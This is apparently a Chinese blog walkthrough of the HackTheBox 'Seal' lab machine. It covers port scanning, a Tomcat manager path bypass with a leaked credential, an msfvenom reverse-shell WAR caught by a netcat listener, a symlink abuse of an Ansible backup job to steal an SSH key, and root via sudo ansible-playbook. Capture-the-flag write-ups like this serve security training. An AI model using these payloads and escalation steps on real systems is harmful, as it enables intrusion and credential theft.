title: HackTheBox-Seal author: CrazyInSide layout: true categories: HackTheBox cover: https://www.worldisend.com/img/Seal.png tags:
•Linux
CrazyInSide:~/HackTheBox$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.250Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-09-01 10:04:57 GMTInitiating SYN Stealth ScanScanning 1 hosts [131070 ports/host]Discovered open port 8080/tcp on 10.10.10.250Discovered open port 443/tcp on 10.10.10.250Discovered open port 22/tcp on 10.10.10.250CrazyInSide:~/HackTheBox$ sudo nmap -sC -sV 10.10.10.250 -p8080,443,22Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-09-01 18:09 CSTNmap scan report for 10.10.10.250Host is up (0.083s latency).PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 3072 4b894739673d07315e3f4c27411ff967 (RSA)| 256 04a74f399565c5b08dd5492ed8440036 (ECDSA)|_ 256 b45e8393c54249de7125927123b18554 (ED25519)443/tcp open ssl/http nginx 1.18.0 (Ubuntu)| tls-alpn:|_ http/1.1|_http-server-header: nginx/1.18.0 (Ubuntu)| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK| Not valid before: 2021-05-05T10:24:03|_Not valid after: 2022-05-05T10:24:03|_http-title: Seal Market|_ssl-date: TLS randomness does not represent time| tls-nextprotoneg:|_ http/1.18080/tcp open http-proxy| http-auth:| HTTP/1.1 401 Unauthorizedx0D|_ Server returned status 401 but no WWW-Authenticate header.|_http-title: Site doesn't have a title (text/html;charset=utf-8).| fingerprint-strings:| FourOhFourRequest:| HTTP/1.1 401 Unauthorized| Date: Thu, 01 Sep 2022 10:10:04 GMT| Set-Cookie: JSESSIONID=node02q9tfbpnsxre1bm1gkv3wal0a2.node0; Path=/; HttpOnly| Expires: Thu, 01 Jan 1970 00:00:00 GMT| Content-Type: text/html;charset=utf-8| Content-Length: 0| GetRequest:| HTTP/1.1 401 Unauthorized| Date: Thu, 01 Sep 2022 10:10:03 GMT| Set-Cookie: JSESSIONID=node0yvbmr291moot13csk9lwzfixi0.node0; Path=/; HttpOnly| Expires: Thu, 01 Jan 1970 00:00:00 GMT| Content-Type: text/html;charset=utf-8| Content-Length: 0| HTTPOptions:| HTTP/1.1 200 OK| Date: Thu, 01 Sep 2022 10:10:04 GMT| Set-Cookie: JSESSIONID=node01jub9w55x03xg1mawzh2zjn5sd1.node0; Path=/; HttpOnly| Expires: Thu, 01 Jan 1970 00:00:00 GMT| Content-Type: text/html;charset=utf-8| Allow: GET,HEAD,POST,OPTIONS| Content-Length: 0| RPCCheck:| HTTP/1.1 400 Illegal character OTEXT=0x80| Content-Type: text/html;charset=iso-8859-1| Content-Length: 71| Connection: close| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>| RTSPRequest:| HTTP/1.1 505 Unknown Version| Content-Type: text/html;charset=iso-8859-1| Content-Length: 58| Connection: close| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>| Socks4:| HTTP/1.1 400 Illegal character CNTL=0x4| Content-Type: text/html;charset=iso-8859-1| Content-Length: 69| Connection: close| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>| Socks5:| HTTP/1.1 400 Illegal character CNTL=0x5| Content-Type: text/html;charset=iso-8859-1| Content-Length: 69| Connection: close|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://ParrotOS.org/cgi-bin/submit.cgi?new-service :SF-Port8080-TCP:V=7.92SVN%I=7%D=9/1%Time=631084FB%P=x86_64-unknown-linux-gSF:nu%r(GetRequest,F4,"HTTP/1.1x20401x20UnauthorizedrnDate:x20Thu,xSF:2001x20Sepx202022x2010:10:03x20GMTrnSet-Cookie:x20JSESSIONID=nodSF:e0yvbmr291moot13csk9lwzfixi0.node0;x20Path=/;x20HttpOnlyrnExpires:SF:x20Thu,x2001x20Janx201970x2000:00:00x20GMTrnContent-Type:x20teSF:xt/html;charset=utf-8rnContent-Length:x200rnrn")%r(HTTPOptions,1SF:09,"HTTP/1.1x20200x20OKrnDate:x20Thu,x2001x20Sepx202022x2010:SF:10:04x20GMTrnSet-Cookie:x20JSESSIONID=node01jub9w55x03xg1mawzh2zjn5SF:sd1.node0;x20Path=/;x20HttpOnlyrnExpires:x20Thu,x2001x20Janx20SF:1970x2000:00:00x20GMTrnContent-Type:x20text/html;charset=utf-8rnSF:Allow:x20GET,HEAD,POST,OPTIONSrnContent-Length:x200rnrn")%r(RTSSF:PRequest,AD,"HTTP/1.1x20505x20Unknownx20VersionrnContent-Type:x2SF:0text/html;charset=iso-8859-1rnContent-Length:x2058rnConnection:xSF:20closernrn<h1>Badx20Messagex20505</h1><pre>reason:x20Unknownx2SF:0Version</pre>")%r(FourOhFourRequest,F4,"HTTP/1.1x20401x20UnauthorizSF:edrnDate:x20Thu,x2001x20Sepx202022x2010:10:04x20GMTrnSet-CookSF:ie:x20JSESSIONID=node02q9tfbpnsxre1bm1gkv3wal0a2.node0;x20Path=/;x2SF:0HttpOnlyrnExpires:x20Thu,x2001x20Janx201970x2000:00:00x20GMTrSF:nContent-Type:x20text/html;charset=utf-8rnContent-Length:x200rnSF:rn")%r(Socks5,C3,"HTTP/1.1x20400x20Illegalx20characterx20CNTL=0x5SF:rnContent-Type:x20text/html;charset=iso-8859-1rnContent-Length:x2SF:069rnConnection:x20closernrn<h1>Badx20Messagex20400</h1><pre>rSF:eason:x20Illegalx20characterx20CNTL=0x5</pre>")%r(Socks4,C3,"HTTP/1SF:.1x20400x20Illegalx20characterx20CNTL=0x4rnContent-Type:x20text/SF:html;charset=iso-8859-1rnContent-Length:x2069rnConnection:x20closSF:ernrn<h1>Badx20Messagex20400</h1><pre>reason:x20Illegalx20charaSF:cterx20CNTL=0x4</pre>")%r(RPCCheck,C7,"HTTP/1.1x20400x20Illegalx20SF:characterx20OTEXT=0x80rnContent-Type:x20text/html;charset=iso-8859-SF:1rnContent-Length:x2071rnConnection:x20closernrn<h1>Badx20MeSF:ssagex20400</h1><pre>reason:x20Illegalx20characterx20OTEXT=0x80</prSF:e>");Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 40.34 secondszsh: segmentation fault sudo nmap -sC -sV 10.10.10.250 -p8080,443,22
这里有一个搜索框,但搜索框似乎调用的GoogleMap.8080端口有一个GitBucket
这应用有个历史漏洞:
CrazyInSide:~/HackTheBox$ searchsploit GitBucket------------------------------------------------------------------------------------ ---------------------------------Exploit Title | Path------------------------------------------------------------------------------------ ---------------------------------GitBucket 4.23.1 - Remote Code Execution | java/webapps/44668.py------------------------------------------------------------------------------------ ---------------------------------Shellcodes: No ResultsPapers: No Results
但是该漏洞文档说明仅在windows服务器上才有效。尝试注册了一个账户,目标可能部署了tomcat,在tomcat历史提交中,能够找到一组账号密码。
username="tomcat" password="42MrHBf*z8{Z%"我开始对80端口进行目录枚举:
CrazyInSide:~/HackTheBox$ dirsearch -u https://seal.htb/_|. _ _ _ _ _ _|_ v0.4.2(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927Output File: /home/crazyinside/.dirsearch/reports/seal.htb/-_22-09-01_18-51-03.txtError Log: /home/crazyinside/.dirsearch/logs/errors-22-09-01_18-51-03.logTarget: https://seal.htb/[18:51:04] Starting:[18:51:05] 302 - 0B - /js -> http://seal.htb/js/[18:51:31] 400 - 804B - /..................etcpasswd[18:51:33] 400 - 804B - /a%5c.aspx[18:51:36] 302 - 0B - /admin -> http://seal.htb/admin/[18:52:05] 302 - 0B - /css -> http://seal.htb/css/[18:52:15] 403 - 564B - /host-manager/html[18:52:16] 302 - 0B - /host-manager/ -> http://seal.htb/host-manager/html[18:52:16] 302 - 0B - /icon -> http://seal.htb/icon/[18:52:16] 302 - 0B - /images -> http://seal.htb/images/[18:52:18] 200 - 19KB - /index.html[18:52:26] 302 - 0B - /manager -> http://seal.htb/manager/[18:52:26] 403 - 564B - /manager/html[18:52:26] 302 - 0B - /manager/ -> http://seal.htb/manager/html[18:52:26] 403 - 564B - /manager/html/[18:52:26] 401 - 2KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage[18:52:26] 401 - 2KB - /manager/jmxproxy[18:52:26] 401 - 2KB - /manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY[18:52:26] 401 - 2KB - /manager/status/all[18:52:26] 401 - 2KB - /manager/jmxproxy/?qry=STUFF[18:52:26] 401 - 2KB - /manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=[18:52:26] 401 - 2KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage&key=used[18:52:26] 401 - 2KB - /manager/jmxproxy/?set=Catalina%3Atype%3DValve%2Cname%3DErrorReportValve%2Chost%3Dlocalhost&att=debug&val=cow[18:52:26] 401 - 2KB - /manager/jmxproxy/?set=BEANNAME&att=MYATTRIBUTE&val=NEWVALUE[18:52:26] 401 - 2KB - /manager/jmxproxy/?invoke=BEANNAME&op=METHODNAME&ps=COMMASEPARATEDPARAMETERSTask Completed
似乎该站点运行着tomcat,因为tomcat默认目录就是http://seal.htb/manager/html。但是为什么是http?我开始翻阅nginx配置文件:
似乎这些需要客户端提供一个证书,如果我通过了认证会代理到目标8000端口。路径其实好绕,它只检测/manager/html。我只需要访问/manager;/html即可,然后输入刚刚找到的tomcat凭证即可:
tomcat生成war包一键部署即可:
CrazyInSide:~/HackTheBox$ msfvenom -p java/shell_reverse_tcp lhost=10.10.16.6 lport=1337 -f war -o test.warPayload size: 13316 bytesFinal size of war file: 13316 bytesSaved as: test.warCrazyInSide:~/HackTheBox$ nc -lvnp 1337listening on [any] 1337 ...connect to [10.10.16.6] from (UNKNOWN) [10.10.10.250] 43076iduid=997(tomcat) gid=997(tomcat) groups=997(tomcat)script -qc /bin/bash /dev/nulltomcat@seal:/var/lib/tomcat9$
在opt目录有一个备份文件夹:
tomcat@seal:/opt/backups$ lsarchives playbooktomcat@seal:/opt/backups$ cd archives/tomcat@seal:/opt/backups/archives$ lsbackup-2022-09-01-12:30:32.gz backup-2022-09-01-12:31:33.gztomcat@seal:/opt/backups/archives$ cat ../playbook/run.yml- hosts: localhosttasks:- name: Copy Filessynchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes- name: Server Backupsarchive:path: /opt/backups/files/dest: "/opt/backups/archives/backup-{{ansible_date_time.date}}-{{ansible_date_time.time}}.gz"- name: Cleanfile:state: absentpath: /opt/backups/files/tomcat@seal:/opt/backups/archives$
似乎每过一会儿变会有计划任务将/var/lib/tomcat9/webapps/ROOT/admin/dashboard备份归档到backup。
tomcat@seal:/opt/backups/archives$ ls -alltotal 2968drwxrwxr-x 2 luis luis 4096 Sep 1 12:34 .drwxr-xr-x 4 luis luis 4096 Sep 1 12:34 ..-rw-rw-r-- 1 luis luis 606047 Sep 1 12:30 backup-2022-09-01-12:30:32.gz-rw-rw-r-- 1 luis luis 606047 Sep 1 12:31 backup-2022-09-01-12:31:33.gz-rw-rw-r-- 1 luis luis 606047 Sep 1 12:32 backup-2022-09-01-12:32:33.gz-rw-rw-r-- 1 luis luis 606047 Sep 1 12:33 backup-2022-09-01-12:33:33.gz-rw-rw-r-- 1 luis luis 606047 Sep 1 12:34 backup-2022-09-01-12:34:33.gztomcat@seal:/opt/backups/archives$
它所属于luis用户,而uploads目录可读可写可执行:
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard$ ls -alltotal 100drwxr-xr-x 7 root root 4096 May 7 2021 .drwxr-xr-x 3 root root 4096 May 6 2021 ..drwxr-xr-x 5 root root 4096 Mar 7 2015 bootstrapdrwxr-xr-x 2 root root 4096 Mar 7 2015 cssdrwxr-xr-x 4 root root 4096 Mar 7 2015 images-rw-r--r-- 1 root root 71744 May 6 2021 index.htmldrwxr-xr-x 4 root root 4096 Mar 7 2015 scriptsdrwxrwxrwx 2 root root 4096 May 7 2021 uploadstomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard$ ln -s /home/luis /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads
将其链接向luis用户目录。过会儿有一个非常大的备份:
tomcat@seal:/opt/backups/archives$ ls -alltotal 113612drwxrwxr-x 2 luis luis 4096 Sep 1 12:36 .drwxr-xr-x 4 luis luis 4096 Sep 1 12:36 ..-rw-rw-r-- 1 luis luis 606047 Sep 1 12:35 backup-2022-09-01-12:35:33.gz-rw-rw-r-- 1 luis luis 115723773 Sep 1 12:36 backup-2022-09-01-12:36:32.gztomcat@seal:/opt/backups/archives$ cp backup-2022-09-01-12:36:32.gz /tmptomcat@seal:/opt/backups/archives$ cd /tmptomcat@seal:/tmp$ tar xf backup-2022-09-01-12:36:32.gz --force-localtomcat@seal:/tmp$ lsbackup-2022-09-01-12:30:32.gz dashboard pwk.py tmpypck0ak1backup-2022-09-01-12:36:32.gz hsperfdata_tomcat tmp7e2a49nntomcat@seal:/tmp$ ls -alltotal 113636drwxrwxrwt 6 root root 4096 Sep 1 12:38 .drwxr-xr-x 20 root root 4096 Jul 26 2021 ..-rw-r----- 1 tomcat tomcat 606047 Sep 1 12:30 backup-2022-09-01-12:30:32.gz-rw-r----- 1 tomcat tomcat 115723773 Sep 1 12:37 backup-2022-09-01-12:36:32.gzdrwxr-x--- 7 tomcat tomcat 4096 May 7 2021 dashboarddrwxr-x--- 2 tomcat tomcat 4096 Sep 1 10:00 hsperfdata_tomcat-rw-r----- 1 tomcat tomcat 3448 Sep 1 12:23 pwk.pydrwx------ 4 tomcat tomcat 4096 Sep 1 12:24 tmp7e2a49nndrwx------ 4 tomcat tomcat 4096 Sep 1 12:24 tmpypck0ak1tomcat@seal:/tmp$ cd dashboard/
tomcat@seal:/tmp/dashboard/uploads/luis$ ls -alltotal 51320drwxr-x--- 9 tomcat tomcat 4096 May 7 2021 .drwxr-x--- 3 tomcat tomcat 4096 Sep 1 12:38 ..drwxr-x--- 3 tomcat tomcat 4096 Sep 1 12:38 .ansible-rw-r----- 1 tomcat tomcat 220 May 5 2021 .bash_logout-rw-r----- 1 tomcat tomcat 3797 May 5 2021 .bashrcdrwxr-x--- 3 tomcat tomcat 4096 Sep 1 12:38 .cachedrwxr-x--- 3 tomcat tomcat 4096 Sep 1 12:38 .configdrwxr-x--- 7 tomcat tomcat 4096 Sep 1 12:38 .gitbucket-rw-r----- 1 tomcat tomcat 52497951 Jan 14 2021 gitbucket.wardrwxr-x--- 3 tomcat tomcat 4096 Sep 1 12:38 .javadrwxr-x--- 3 tomcat tomcat 4096 Sep 1 12:38 .local-rw-r----- 1 tomcat tomcat 807 May 5 2021 .profiledrwx------ 2 tomcat tomcat 4096 Sep 1 12:38 .ssh-r-------- 1 tomcat tomcat 33 Sep 1 10:00 user.txttomcat@seal:/tmp/dashboard/uploads/luis$ cat user.txt98f4bf24..............................
有用户秘钥:
tomcat@seal:/tmp/dashboard/uploads/luis/.ssh$ lsauthorized_keys id_rsa id_rsa.pubtomcat@seal:/tmp/dashboard/uploads/luis/.ssh$ cat id_rsaCrazyInSide:~/HackTheBox$ ssh -i id_rsa luis@10.10.10.250The authenticity of host '10.10.10.250 (10.10.10.250)' can't be established.ED25519 key fingerprint is SHA256:CK0IgtHX4isQwWAPna6oD88DnRAM9OacxQExxLSnlL0.This key is not known by any other namesAre you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '10.10.10.250' (ED25519) to the list of known hosts.Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)* Documentation: https://help.ubuntu.com* Management: https://landscape.canonical.com* Support: https://ubuntu.com/advantageSystem information as of Thu 01 Sep 2022 12:41:22 PM UTCSystem load: 0.29 Processes: 165Usage of /: 49.2% of 9.58GB Users logged in: 0Memory usage: 30% IPv4 address for eth0: 10.10.10.250Swap usage: 0%* Pure upstream Kubernetes 1.21, smallest, simplest cluster ops!https://microk8s.io/22 updates can be applied immediately.15 of these updates are standard security updates.To see these additional updates run: apt list --upgradableThe list of available updates is more than a week old.To check for new updates run: sudo apt updateLast login: Fri May 7 07:00:18 2021 from 10.10.14.2luis@seal:~$
luis@seal:~$ sudo -lMatching Defaults entries for luis on seal:env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binUser luis may run the following commands on seal:(ALL) NOPASSWD: /usr/bin/ansible-playbook *luis@seal:~$ cat run.yml- hosts: localhosttasks:- name: catshell: cat /root/root.txt > flag.txtregister: out- name: stdoutdebug: msg=""- name: stderrdebug: msg=""
luis@seal:~$ sudo /usr/bin/ansible-playbook run.yml[WARNING]: provided hosts list is empty, only localhost is available. Note that the implicit localhost does not match 'all'PLAY [localhost] *******************************************************************************************************************************************************************************TASK [Gathering Facts] *************************************************************************************************************************************************************************ok: [localhost]TASK [cat] *************************************************************************************************************************************************************************************changed: [localhost]TASK [stdout] **********************************************************************************************************************************************************************************ok: [localhost] => {"msg": ""}TASK [stderr] **********************************************************************************************************************************************************************************ok: [localhost] => {"msg": ""}PLAY RECAP *************************************************************************************************************************************************************************************localhost : ok=4 changed=1 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0luis@seal:~$ lsflag.txt gitbucket.war run.yml user.txtluis@seal:~$ cat flag.txt9b0c..............................luis@seal:~$
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论